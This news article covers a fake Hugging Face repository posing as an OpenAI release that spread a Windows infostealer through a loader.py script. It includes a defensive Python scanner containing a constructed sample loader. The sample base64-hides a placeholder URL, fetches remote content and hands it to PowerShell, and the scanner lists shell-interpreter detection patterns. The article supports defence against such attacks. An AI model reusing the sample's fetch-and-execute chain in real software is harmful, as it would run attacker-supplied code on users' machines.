Hugging Face Supply Chain Attack Highlights AI Security Risks


A malicious Hugging Face repository posing as an OpenAI release distributed infostealer malware to Windows systems and had amassed close to 244,000 downloads before it was removed, according to a recent report by the AI security firm HiddenLayer. Because the attackers may have tampered with the download count to inflate it, the true scope of the impact remains unclear.

According to HiddenLayer, the fake release ‘Open-OSS/privacy-filter’ was modeled on OpenAI’s real Privacy Filter: the original model card was copied almost verbatim, and the repository included a malicious loader.py file that loaded and executed credential-stealing malware on victims’ Windows machines.

The malicious repo reached the top of Hugging Face’s ‘trending’ list within just 18 hours and accumulated 667 likes – again, figures the attackers may have inflated to make the repository look more attractive.


Public AI model repositories are becoming a software supply-chain threat as more developers and data scientists clone them directly into corporate environments that have access to source code, cloud credentials, and internal systems.

While the README of the counterfeit model closely resembled that of the real project, it differed in instructing users to run start.bat on Windows and python loader.py on Linux and macOS, which HiddenLayer identified as the key steps of the infection routine.

Security experts had previously warned about malware injected into AI models and their associated setup files on Hugging Face and similar repositories. In earlier cases, the malware was embedded within Pickle-serialized model files.


Harmful loader posing as setup routine

HiddenLayer reported that loader.py opened with decoy code resembling an AI model loader and quickly moved on to a hidden infection chain. The script bypassed SSL verification, decoded a base64-encoded URL pointing to jsonkeeper.com, fetched payload instructions from that remote location, and executed commands through PowerShell on Windows systems.
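As an added example (not HiddenLayer’s tooling or code from the repository), the following Python script statically flags the behaviours attributed to loader.py above before a cloned repo is ever run: an SSL-verification bypass, a base64-decoded literal, a remote fetch, and process execution or a shell-interpreter string. The sample loader is constructed, is only parsed and never executed, and its hidden URL decodes to a reserved .invalid host; the risk thresholds are the author’s assumption.

```python
import ast  # ast.unparse requires Python 3.9+

# Constructed sample mirroring the chain described for loader.py: decoy model
# loader, SSL verification off, base64-hidden URL, remote fetch, PowerShell.
SAMPLE_LOADER = '''
import base64, ssl, subprocess, urllib.request
from transformers import AutoModel  # decoy: looks like a real model loader

def load_model(name="privacy-filter"):
    return AutoModel.from_pretrained(name)

ssl._create_default_https_context = ssl._create_unverified_context
url = base64.b64decode("aHR0cHM6Ly9leGFtcGxlLmludmFsaWQvY29uZmln").decode()
cfg = urllib.request.urlopen(url).read().decode()
subprocess.run(["powershell", "-Command", cfg])
'''

SUSPICIOUS_CALLS = {
    "base64.b64decode": "base64-decoded literal",
    "urllib.request.urlopen": "remote fetch",
    "requests.get": "remote fetch",
    "subprocess.run": "process execution",
    "subprocess.Popen": "process execution",
    "os.system": "process execution",
}
SHELL_WORDS = ("powershell", "pwsh", "cmd.exe", "/bin/sh", "bash -c")

def triage_loader(source):
    """Return sorted (line, reason) findings for one Python source file."""
    findings = set()
    for node in ast.walk(ast.parse(source)):
        if isinstance(node, ast.Call):
            reason = SUSPICIOUS_CALLS.get(ast.unparse(node.func))
            if reason:
                findings.add((node.lineno, reason))
        elif isinstance(node, ast.Attribute) and \
                ast.unparse(node) == "ssl._create_unverified_context":
            findings.add((node.lineno, "SSL verification disabled"))
        elif isinstance(node, ast.Constant) and isinstance(node.value, str) \
                and any(w in node.value.lower() for w in SHELL_WORDS):
            findings.add((node.lineno, "shell interpreter literal"))
    return sorted(findings)

def risk_level(findings):
    """'high' for a fetch-then-execute chain, 'medium' for any lone flag."""
    reasons = {r for _, r in findings}
    if "remote fetch" in reasons and reasons & {"process execution", "shell interpreter literal"}:
        return "high"
    return "medium" if reasons else "low"
```

Run it over every .py file in a freshly cloned model repo and treat any "high" result as a reason not to execute start.bat or loader.py until the code has been read.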

As HiddenLayer noted, using jsonkeeper.com as the C2 channel allowed the attackers to change the payloads without altering any code in the repository.

The payload delivered via the PowerShell command downloaded an additional batch file from the attacker’s domain, after which the malware established persistence by creating a scheduled task disguised as an Edge browser update process.

The infostealer, written in Rust, targeted Chromium- and Firefox-derived browsers, Discord local storage, crypto wallets, FileZilla configuration files, and host information.

Campaigns on a wider scale

HiddenLayer also reported that the same team found six other Hugging Face repositories with nearly identical loader logic that shared the infrastructure used in this attack.

This incident echoes earlier warnings about threats to AI on Hugging Face, ranging from AI poisoning to OpenClaw installer malware. The common denominator is that attackers abuse AI model development workflows to breach otherwise secure environments. AI repositories typically include executables, setup instructions, dependencies, notebooks, and scripts – so it is this peripheral material, rather than the models themselves, that poses the threat.

According to Sakshi Grover, senior research manager for cybersecurity services at IDC, traditional software composition analysis (SCA) was designed to analyze dependency manifests, libraries, and container images, and is poorly equipped to detect malicious loader logic within AI repositories. Grover also cited IDC’s FutureScape report published in November 2025, which predicts that by 2027 a bill of materials (BOM) for agentic AI systems should account for 60% of agentic AI systems in place.

Response and Mitigation

HiddenLayer recommended that anyone who used the code from Open-OSS/privacy-filter and ran start.bat, python loader.py, or any other file from the repository on a Windows system should consider the system infected and reimage it. Browser sessions could be compromised even if no passwords were stored on the machine itself.
